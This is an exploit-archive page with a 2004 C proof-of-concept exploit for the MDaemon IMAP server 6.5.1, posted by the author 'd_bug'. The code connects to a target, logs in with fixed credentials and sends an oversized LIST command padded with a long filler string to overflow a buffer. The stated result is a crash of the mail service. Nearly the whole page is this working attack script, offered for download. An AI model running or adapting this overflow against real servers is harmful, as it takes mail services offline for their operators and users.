what you don't know can hurt you

mdaemon_imap.c

mdaemon_imap.c
Posted Sep 30, 2004
Authored by d_bug

Remote proof of concept exploit for MDaemon IMAP server version 6.5.1 that makes use of an overflow in the LIST command.

tags | exploit, remote, overflow, imap, proof of concept
MD5 | 70e53f1694ce2dc74788bb19d73ba65e

mdaemon_imap.c

Change Mirror Download
/////////////////////////////////////////////////////////////
// Remote proof-of-concept exploit //
// for //
// Mdaemon IMAP server v6.5.1 //
// and //
// possible other version. //
// Find bug: D_BuG. //
// Author: D_BuG. //
// D_BuG@bk.ru //
// Data: 16/09/2004 //
// NOT PUBLIC! //
// //
/////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int sock,err;
struct sockaddr_in sa;


int main (int argc, char *argv[])

{

printf("Remote proof-of-concept(buffer overflow) exploit\n");
printf(" for \n");
printf("Mdaemon IMAP server v6.5.1 and possible other version.\n");
if(argc!=3)
{
printf("Usage: %s <IPADDRESS> <PORT>\n",argv[0]);
printf("e.g.:%s 192.168.1.1 143\n",argv[0]);
exit(-1);
}


sa.sin_family=AF_INET;
sa.sin_port=htons(atoi(argv[2]));
if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
printf("Error inet_pton\n");

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

printf("[~]Connecting...\n");

if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
{
printf("[-]Connect filed....\nExit...\n");
exit(-1);
}


char send[]="0001 LOGIN ""test"" ""console""\r\n";
char send3[]=
"007x LIST "
"""aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAA"""
""" *BBBBBBBBBBaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAc"""
"\r\n\r\n";
char rcv[1024];


printf("[+]Ok!\n");
sleep(2);
printf("[~]Get banner...\n");
if(read(sock,&rcv,sizeof(rcv)) !=-1){}

if(strstr(rcv,"IMAP")==NULL)
{
printf("[-]Failed!\n");
}
else
{
printf("[+]Ok!\n");
}

printf("[~]Send LOGIN and PASSWORD...\n");
write(sock,send,sizeof(send)-1);
sleep(2);
memset(rcv,0,1024);
if(read(sock,&rcv,sizeof(rcv)) !=-1){}

if(strstr(rcv,"OK")==NULL)
{
printf("[-]Failed login or password...\nExit...");
exit(-1);
}

printf("[+]Ok!\n");

printf("[~]Send LIST...\n");
write(sock,send3,sizeof(send3)-1);
sleep(2);
memset(rcv,0,1024);
if(read(sock,&rcv,sizeof(rcv)) !=-1){}

if(strstr(rcv,"BAD")!=NULL)
{
printf("[-]Exploit filed...please check your version Mdaemon!\n");
printf("[-]Exit...\n");
exit(-1);
}
printf("[+]Ok!\n");
printf("[+]Crash service.....\n");
printf("[~]Done.\n");

close(sock);

return 0;

}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    2 Files
  • 2
    Mar 2nd
    18 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    12 Files
  • 5
    Mar 5th
    19 Files
  • 6
    Mar 6th
    8 Files
  • 7
    Mar 7th
    1 Files
  • 8
    Mar 8th
    1 Files
  • 9
    Mar 9th
    11 Files
  • 10
    Mar 10th
    15 Files
  • 11
    Mar 11th
    9 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    13 Files
  • 14
    Mar 14th
    10 Files
  • 15
    Mar 15th
    13 Files
  • 16
    Mar 16th
    27 Files
  • 17
    Mar 17th
    15 Files
  • 18
    Mar 18th
    23 Files
  • 19
    Mar 19th
    25 Files
  • 20
    Mar 20th
    10 Files
  • 21
    Mar 21st
    6 Files
  • 22
    Mar 22nd
    1 Files
  • 23
    Mar 23rd
    22 Files
  • 24
    Mar 24th
    15 Files
  • 25
    Mar 25th
    23 Files
  • 26
    Mar 26th
    20 Files
  • 27
    Mar 27th
    15 Files
  • 28
    Mar 28th
    10 Files
  • 29
    Mar 29th
    1 Files
  • 30
    Mar 30th
    18 Files
  • 31
    Mar 31st
    6 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close